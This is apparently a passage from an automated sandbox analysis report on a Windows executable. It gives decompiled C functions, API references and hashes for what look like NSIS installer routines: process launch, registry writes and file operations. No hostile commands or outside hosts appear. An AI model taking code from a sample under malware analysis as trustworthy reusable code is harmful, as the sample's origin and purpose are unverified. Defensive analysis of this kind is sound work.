                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp Download File
                                                                              Similarity
                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                              • String ID: %u.%u%s%s
                                                                              • API String ID: 3540041739-3551169577
                                                                              • Opcode ID: 1889a7adf10d335a807e3f6632fec442bbf7daaf42d867185502e520216b2d79
                                                                              • Instruction ID: e1fe79347d8d052d3bbdd742c897f6fd786447eee0d7872ec31327a957c1f8d6
                                                                              • Opcode Fuzzy Hash: 1889a7adf10d335a807e3f6632fec442bbf7daaf42d867185502e520216b2d79
                                                                              • Instruction Fuzzy Hash: 35110473A0012477DB00666D9C46EAF3689CBC6374F14023BFA25F61D1E9788C1186A8
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 54%
                                                                              			E00401C19(void* __ecx) {
                                                                              				signed int _t30;
                                                                              				CHAR* _t33;
                                                                              				long _t34;
                                                                              				int _t39;
                                                                              				signed int _t40;
                                                                              				int _t44;
                                                                              				void* _t46;
                                                                              				int _t51;
                                                                              				struct HWND__* _t55;
                                                                              				void* _t58;
                                                                              
                                                                              				_t46 = __ecx;
                                                                              				 *(_t58 - 8) = E00402A9A(0x33);
                                                                              				 *(_t58 + 8) = E00402A9A(0x44);
                                                                              				if(( *(_t58 - 0x10) & 0x00000001) == 0) {
                                                                              					 *((intOrPtr*)(__ebp - 8)) = E00405936(__ecx,  *((intOrPtr*)(__ebp - 8)));
                                                                              				}
                                                                              				__eflags =  *(_t58 - 0x10) & 0x00000002;
                                                                              				if(( *(_t58 - 0x10) & 0x00000002) == 0) {
                                                                              					 *(_t58 + 8) = E00405936(_t46,  *(_t58 + 8));
                                                                              				}
                                                                              				__eflags =  *((intOrPtr*)(_t58 - 0x28)) - 0x21;
                                                                              				_push(1);
                                                                              				if(__eflags != 0) {
                                                                              					_t53 = E00402A9A();
                                                                              					_t30 = E00402A9A();
                                                                              					asm("sbb ecx, ecx");
                                                                              					asm("sbb eax, eax");
                                                                              					_t33 =  ~( *_t29) & _t53;
                                                                              					__eflags = _t33;
                                                                              					_t34 = FindWindowExA( *(_t58 - 8),  *(_t58 + 8), _t33,  ~( *_t30) & _t30);
                                                                              					goto L10;
                                                                              				} else {
                                                                              					_t55 = E00402A7D();
                                                                              					_t39 = E00402A7D();
                                                                              					_t51 =  *(_t58 - 0x10) >> 2;
                                                                              					if(__eflags == 0) {
                                                                              						_t34 = SendMessageA(_t55, _t39,  *(_t58 - 8),  *(_t58 + 8));
                                                                              						L10:
                                                                              						 *(_t58 - 0x34) = _t34;
                                                                              					} else {
                                                                              						_t40 = SendMessageTimeoutA(_t55, _t39,  *(_t58 - 8),  *(_t58 + 8), _t44, _t51, _t58 - 0x34);
                                                                              						asm("sbb eax, eax");
                                                                              						 *((intOrPtr*)(_t58 - 4)) =  ~_t40 + 1;
                                                                              					}
                                                                              				}
                                                                              				__eflags =  *((intOrPtr*)(_t58 - 0x24)) - _t44;
                                                                              				if( *((intOrPtr*)(_t58 - 0x24)) >= _t44) {
                                                                              					_push( *(_t58 - 0x34));
                                                                              					E0040591D();
                                                                              				}
                                                                              				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t58 - 4));
                                                                              				return 0;
                                                                              			}

                                                                              APIs
                                                                              • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7B
                                                                              • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C93
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp Download File
                                                                              Similarity
                                                                              • API ID: MessageSend$Timeout
                                                                              • String ID: !
                                                                              • API String ID: 1777923405-2657877971
                                                                              • Opcode ID: 2afc5cef8f1a93f9b63a8f53a852115a8ca671caf7fe296a62c6272823973d68
                                                                              • Instruction ID: 390733356b0797d34322a861430c44886bb095c9ae44ddfd4580086c5e9a0f80
                                                                              • Opcode Fuzzy Hash: 2afc5cef8f1a93f9b63a8f53a852115a8ca671caf7fe296a62c6272823973d68
                                                                              • Instruction Fuzzy Hash: 7E219071A44209BFEF119FB0CD4AAAD7FB1EF44304F10443AF501BA1E1D7798A419B18
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 83%
                                                                              			E00401E9C() {
                                                                              				void* _t15;
                                                                              				void* _t24;
                                                                              				void* _t26;
                                                                              				void* _t31;
                                                                              
                                                                              				_t28 = E00402A9A(_t24);
                                                                              				E00404D62(0xffffffeb, _t13);
                                                                              				_t15 = E00405247(_t28, "C:\\Users\\hardz\\AppData\\Local\\Temp");
                                                                              				 *(_t31 + 8) = _t15;
                                                                              				if(_t15 == _t24) {
                                                                              					 *((intOrPtr*)(_t31 - 4)) = 1;
                                                                              				} else {
                                                                              					if( *((intOrPtr*)(_t31 - 0x1c)) != _t24) {
                                                                              						while(WaitForSingleObject( *(_t31 + 8), 0x64) == 0x102) {
                                                                              							E00405CFC(0xf);
                                                                              						}
                                                                              						GetExitCodeProcess( *(_t31 + 8), _t31 - 0x34);
                                                                              						if( *((intOrPtr*)(_t31 - 0x20)) < _t24) {
                                                                              							if( *(_t31 - 0x34) != _t24) {
                                                                              								 *((intOrPtr*)(_t31 - 4)) = 1;
                                                                              							}
                                                                              						} else {
                                                                              							E0040591D(_t26,  *(_t31 - 0x34));
                                                                              						}
                                                                              					}
                                                                              					_push( *(_t31 + 8));
                                                                              					CloseHandle();
                                                                              				}
                                                                              				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t31 - 4));
                                                                              				return 0;
                                                                              			}

                                                                              APIs
                                                                                • Part of subcall function 00404D62: lstrlenA.KERNEL32(0079ED60,00000000,0078EF38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
                                                                                • Part of subcall function 00404D62: lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078EF38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
                                                                                • Part of subcall function 00404D62: lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078EF38,00789938), ref: 00404DBE
                                                                                • Part of subcall function 00404D62: SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
                                                                                • Part of subcall function 00404D62: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
                                                                                • Part of subcall function 00404D62: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
                                                                                • Part of subcall function 00404D62: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
                                                                                • Part of subcall function 00405247: GetFileAttributesA.KERNEL32(?), ref: 0040525A
                                                                                • Part of subcall function 00405247: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,007A1588,00000000), ref: 00405283
                                                                                • Part of subcall function 00405247: CloseHandle.KERNEL32(?), ref: 00405290
                                                                              • WaitForSingleObject.KERNEL32(?,00000064,00000000,C:\Users\user\AppData\Local\Temp,000000EB,00000000), ref: 00401EDB
                                                                              • GetExitCodeProcess.KERNEL32 ref: 00401EEB
                                                                              • CloseHandle.KERNEL32(?,00000000,C:\Users\user\AppData\Local\Temp,000000EB,00000000), ref: 00401F10
                                                                              Strings
                                                                              • C:\Users\user\AppData\Local\Temp, xrefs: 00401EAC
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp Download File
                                                                              Similarity
                                                                              • API ID: MessageSend$CloseHandleProcesslstrlen$AttributesCodeCreateExitFileObjectSingleTextWaitWindowlstrcat
                                                                              • String ID: C:\Users\user\AppData\Local\Temp
                                                                              • API String ID: 4003922372-501415292
                                                                              • Opcode ID: 0ef63ca706419f790af37db11aee738247e198a419f22565458099bb847621dc
                                                                              • Instruction ID: c1fd9e20316fa7c66da1a85616afe7c8cb85e154ba4c90cc335e7add60896660
                                                                              • Opcode Fuzzy Hash: 0ef63ca706419f790af37db11aee738247e198a419f22565458099bb847621dc
                                                                              • Instruction Fuzzy Hash: 05016D71908119EBCF11AFA1DD85A9E7A72EB40345F20803BF601B51E1D7794E41DF5A
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 100%
                                                                              			E00405247(CHAR* _a4, CHAR* _a8) {
                                                                              				struct _PROCESS_INFORMATION _v20;
                                                                              				signed char _t10;
                                                                              				int _t12;
                                                                              
                                                                              				0x7a1588->cb = 0x44;
                                                                              				_t10 = GetFileAttributesA(_a8);
                                                                              				if(_t10 == 0xffffffff || (_t10 & 0x00000010) == 0) {
                                                                              					_a8 = 0;
                                                                              				}
                                                                              				_t12 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, _a8, 0x7a1588,  &_v20);
                                                                              				if(_t12 != 0) {
                                                                              					CloseHandle(_v20.hThread);
                                                                              					return _v20.hProcess;
                                                                              				}
                                                                              				return _t12;
                                                                              			}

                                                                              APIs
                                                                              • GetFileAttributesA.KERNEL32(?), ref: 0040525A
                                                                              • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,007A1588,00000000), ref: 00405283
                                                                              • CloseHandle.KERNEL32(?), ref: 00405290
                                                                              Strings
                                                                              • Error launching installer, xrefs: 00405247
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp
                                                                              Similarity
                                                                              • API ID: AttributesCloseCreateFileHandleProcess
                                                                              • String ID: Error launching installer
                                                                              • API String ID: 2000254098-66219284
                                                                              • Opcode ID: 1c7c90529dee7333dd01d23e0c4e2f505b8b5e8cc16b92771429ee34c240560b
                                                                              • Instruction ID: b26bea9810c6d819578ad0b391bf68386d489ca1151d2b7a54d6b9e5bc1a8a28
                                                                              • Opcode Fuzzy Hash: 1c7c90529dee7333dd01d23e0c4e2f505b8b5e8cc16b92771429ee34c240560b
                                                                              • Instruction Fuzzy Hash: A9F08C74800209AFEB045F64DC099AF3B68FF04314F00822AF825A52E0D338E5249F18
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 100%
                                                                              			E004054CC(CHAR* _a4) {
                                                                              				CHAR* _t7;
                                                                              
                                                                              				_t7 = _a4;
                                                                              				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
                                                                              					lstrcatA(_t7, 0x409010);
                                                                              				}
                                                                              				return _t7;
                                                                              			}

                                                                              APIs
                                                                              • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403134,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 004054D2
                                                                              • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403134,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 004054DB
                                                                              • lstrcatA.KERNEL32(?,00409010), ref: 004054EC
                                                                              Strings
                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 004054CC
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp
                                                                              Similarity
                                                                              • API ID: CharPrevlstrcatlstrlen
                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                              • API String ID: 2659869361-3916508600
                                                                              • Opcode ID: 96c8907afa9cc8b7879c3c2b42171850de2edb10da8343977de176d435203a48
                                                                              • Instruction ID: 286163fd35dd309f39b0ef825f2df36d98798f7c410e009a08a94eb417524d97
                                                                              • Opcode Fuzzy Hash: 96c8907afa9cc8b7879c3c2b42171850de2edb10da8343977de176d435203a48
                                                                              • Instruction Fuzzy Hash: 17D0A7B2505D30AAD10122198C05FCB3A08CF47361B054023F540B21D2C63C1C418FFD
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 85%
                                                                              			E00402386(void* __eax, void* __eflags) {
                                                                              				void* _t15;
                                                                              				char* _t18;
                                                                              				int _t19;
                                                                              				char _t24;
                                                                              				int _t27;
                                                                              				intOrPtr _t33;
                                                                              				void* _t35;
                                                                              
                                                                              				_t15 = E00402B61(__eax);
                                                                              				_t33 =  *((intOrPtr*)(_t35 - 0x14));
                                                                              				 *(_t35 - 0x30) =  *(_t35 - 0x10);
                                                                              				 *(_t35 - 0x44) = E00402A9A(2);
                                                                              				_t18 = E00402A9A(0x11);
                                                                              				 *(_t35 - 4) = 1;
                                                                              				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, 2, _t27, _t35 + 8, _t27);
                                                                              				if(_t19 == 0) {
                                                                              					if(_t33 == 1) {
                                                                              						E00402A9A(0x23);
                                                                              						_t19 = lstrlenA(0x40a418) + 1;
                                                                              					}
                                                                              					if(_t33 == 4) {
                                                                              						_t24 = E00402A7D(3);
                                                                              						 *0x40a418 = _t24;
                                                                              						_t19 = _t33;
                                                                              					}
                                                                              					if(_t33 == 3) {
                                                                              						_t19 = E00402EBD( *((intOrPtr*)(_t35 - 0x18)), _t27, 0x40a418, 0xc00);
                                                                              					}
                                                                              					if(RegSetValueExA( *(_t35 + 8),  *(_t35 - 0x44), _t27,  *(_t35 - 0x30), 0x40a418, _t19) == 0) {
                                                                              						 *(_t35 - 4) = _t27;
                                                                              					}
                                                                              					_push( *(_t35 + 8));
                                                                              					RegCloseKey();
                                                                              				}
                                                                              				 *0x7a3008 =  *0x7a3008 +  *(_t35 - 4);
                                                                              				return 0;
                                                                              			}

                                                                              APIs
                                                                              • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000002,?,?,?,00000011,00000002), ref: 004023BC
                                                                              • lstrlenA.KERNEL32(0040A418,00000023,?,?,?,00000002,?,?,?,00000011,00000002), ref: 004023DC
                                                                              • RegSetValueExA.ADVAPI32(?,?,?,?,0040A418,00000000,?,?,?,00000002,?,?,?,00000011,00000002), ref: 00402415
                                                                              • RegCloseKey.ADVAPI32(?,?,?,0040A418,00000000,?,?,?,00000002,?,?,?,00000011,00000002), ref: 004024FB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp
                                                                              Similarity
                                                                              • API ID: CloseCreateValuelstrlen
                                                                              • String ID:
                                                                              • API String ID: 1356686001-0
                                                                              • Opcode ID: 21fc3b8ac64efd4591be3bedd578ad52bcbb91afdce752df37845370db120b95
                                                                              • Instruction ID: 6c4994433d4710c3b0718cfc4a621a0491726581bd8d7e4452a281464ebddd5e
                                                                              • Opcode Fuzzy Hash: 21fc3b8ac64efd4591be3bedd578ad52bcbb91afdce752df37845370db120b95
                                                                              • Instruction Fuzzy Hash: 9911BEB1E00218BEEB10EFA1DE8DEAF767CEB50758F10403AF904B71C1D6B85D019A68
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 85%
                                                                              			E00401F4B(char __ebx, char* __edi, char* __esi) {
                                                                              				char* _t21;
                                                                              				int _t22;
                                                                              				void* _t33;
                                                                              
                                                                              				 *((intOrPtr*)(_t33 + 8)) = _t33 - 0x58;
                                                                              				_t21 = E00402A9A(0xffffffee);
                                                                              				 *(_t33 - 0x2c) = _t21;
                                                                              				_t22 = GetFileVersionInfoSizeA(_t21, _t33 - 0x30);
                                                                              				 *__esi = __ebx;
                                                                              				 *(_t33 - 8) = _t22;
                                                                              				 *__edi = __ebx;
                                                                              				 *((intOrPtr*)(_t33 - 4)) = 1;
                                                                              				if(_t22 != __ebx) {
                                                                              					__eax = GlobalAlloc(0x40, __eax);
                                                                              					 *(__ebp - 0x34) = __eax;
                                                                              					if(__eax != __ebx) {
                                                                              						if(__eax != 0) {
                                                                              							__ebp - 0x44 = __ebp + 8;
                                                                              							if(VerQueryValueA( *(__ebp - 0x34), 0x409010, __ebp + 8, __ebp - 0x44) != 0) {
                                                                              								 *(__ebp + 8) = E0040591D(__esi,  *((intOrPtr*)( *(__ebp + 8) + 8)));
                                                                              								 *(__ebp + 8) = E0040591D(__edi,  *((intOrPtr*)( *(__ebp + 8) + 0xc)));
                                                                              								 *((intOrPtr*)(__ebp - 4)) = __ebx;
                                                                              							}
                                                                              						}
                                                                              						_push( *(__ebp - 0x34));
                                                                              						GlobalFree();
                                                                              					}
                                                                              				}
                                                                              				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t33 - 4));
                                                                              				return 0;
                                                                              			}

                                                                              APIs
                                                                              • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401F60
                                                                              • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F7E
                                                                              • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F97
                                                                              • VerQueryValueA.VERSION(?,00409010,?,?,?,?,?,00000000), ref: 00401FB0
                                                                                • Part of subcall function 0040591D: wsprintfA.USER32 ref: 0040592A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp
                                                                              Similarity
                                                                              • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                              • String ID:
                                                                              • API String ID: 1404258612-0
                                                                              • Opcode ID: f598b284a3ed536213d34974b8b84d86eb34143baa9c6cdb9838dc1c0fb271d9
                                                                              • Instruction ID: 008c8d9b42a3eb8001c26ba2e1db8d9e55e1e47276d372f8316595cd69ee8cc3
                                                                              • Opcode Fuzzy Hash: f598b284a3ed536213d34974b8b84d86eb34143baa9c6cdb9838dc1c0fb271d9
                                                                              • Instruction Fuzzy Hash: 97110AB1900209BEDB01DFA5D9859EEBBB9EF04354F20803AF505F61A1D7389A54DB28
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 92%
                                                                              			E004021F6() {
                                                                              				void* __ebx;
                                                                              				char _t33;
                                                                              				CHAR* _t35;
                                                                              				CHAR* _t38;
                                                                              				void* _t40;
                                                                              
                                                                              				_t35 = E00402A9A(_t33);
                                                                              				 *(_t40 + 8) = _t35;
                                                                              				_t38 = E00402A9A(0x11);
                                                                              				 *(_t40 - 0x64) =  *(_t40 - 8);
                                                                              				 *((intOrPtr*)(_t40 - 0x60)) = 2;
                                                                              				( &(_t35[1]))[lstrlenA(_t35)] = _t33;
                                                                              				( &(_t38[1]))[lstrlenA(_t38)] = _t33;
                                                                              				E004059E1(_t33, 0x40a418, _t38, 0x40a418, 0xfffffff8);
                                                                              				lstrcatA(0x40a418, _t38);
                                                                              				 *(_t40 - 0x5c) =  *(_t40 + 8);
                                                                              				 *(_t40 - 0x58) = _t38;
                                                                              				 *(_t40 - 0x4a) = 0x40a418;
                                                                              				 *((short*)(_t40 - 0x54)) =  *((intOrPtr*)(_t40 - 0x1c));
                                                                              				E00404D62(_t33, 0x40a418);
                                                                              				if(SHFileOperationA(_t40 - 0x64) != 0) {
                                                                              					E00404D62(0xfffffff9, _t33);
                                                                              					 *((intOrPtr*)(_t40 - 4)) = 1;
                                                                              				}
                                                                              				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t40 - 4));
                                                                              				return 0;
                                                                              			}
                                                                              Addresses: 0x004021fc 0x00402200 0x00402208 0x0040220e 0x00402211 0x0040221e 0x0040222f 0x00402233 0x0040223a 0x00402243 0x0040224b 0x0040224e 0x00402251 0x00402255 0x00402266 0x0040226f 0x004026da 0x004026da 0x00402932 0x0040293e

                                                                              APIs
                                                                              • lstrlenA.KERNEL32 ref: 00402218
                                                                              • lstrlenA.KERNEL32(00000000), ref: 00402222
                                                                              • lstrcatA.KERNEL32(0040A418,00000000,0040A418,000000F8,00000000), ref: 0040223A
                                                                                • Part of subcall function 00404D62: lstrlenA.KERNEL32(0079ED60,00000000,0078EF38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
                                                                                • Part of subcall function 00404D62: lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078EF38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
                                                                                • Part of subcall function 00404D62: lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078EF38,00789938), ref: 00404DBE
                                                                                • Part of subcall function 00404D62: SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
                                                                                • Part of subcall function 00404D62: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
                                                                                • Part of subcall function 00404D62: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
                                                                                • Part of subcall function 00404D62: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
                                                                              • SHFileOperationA.SHELL32(?,?,0040A418,0040A418,00000000,0040A418,000000F8,00000000), ref: 0040225E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp
                                                                              Similarity
                                                                              • API ID: lstrlen$MessageSend$lstrcat$FileOperationTextWindow
                                                                              • String ID:
                                                                              • API String ID: 3674637002-0
                                                                              • Opcode ID: 059ecdbd16b9b2e6cf56c4f05bd242d37f3343397a73b98e855651f0486c5599
                                                                              • Instruction ID: 47f3a671e7cdcee79df8a3fca2d1c3b111535efa636a59b05b872e219512585c
                                                                              • Opcode Fuzzy Hash: 059ecdbd16b9b2e6cf56c4f05bd242d37f3343397a73b98e855651f0486c5599
                                                                              • Instruction Fuzzy Hash: 931156B1904218AACB10EFEA8945A9EB7F9DF45324F20813BF115FB2D1D67889458B29
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 100%
                                                                              			E0040555F(CHAR* _a4) {
                                                                              				CHAR* _t3;
                                                                              				char* _t5;
                                                                              				CHAR* _t7;
                                                                              				CHAR* _t8;
                                                                              				void* _t10;
                                                                              
                                                                              				_t8 = _a4;
                                                                              				_t7 = CharNextA(_t8);
                                                                              				_t3 = CharNextA(_t7);
                                                                              				if( *_t8 == 0 ||  *_t7 != 0x5c3a) {
                                                                              					if( *_t8 != 0x5c5c) {
                                                                              						L8:
                                                                              						return 0;
                                                                              					}
                                                                              					_t10 = 2;
                                                                              					while(1) {
                                                                              						_t10 = _t10 - 1;
                                                                              						_t5 = E004054F7(_t3, 0x5c);
                                                                              						if( *_t5 == 0) {
                                                                              							goto L8;
                                                                              						}
                                                                              						_t3 = _t5 + 1;
                                                                              						if(_t10 != 0) {
                                                                              							continue;
                                                                              						}
                                                                              						return _t3;
                                                                              					}
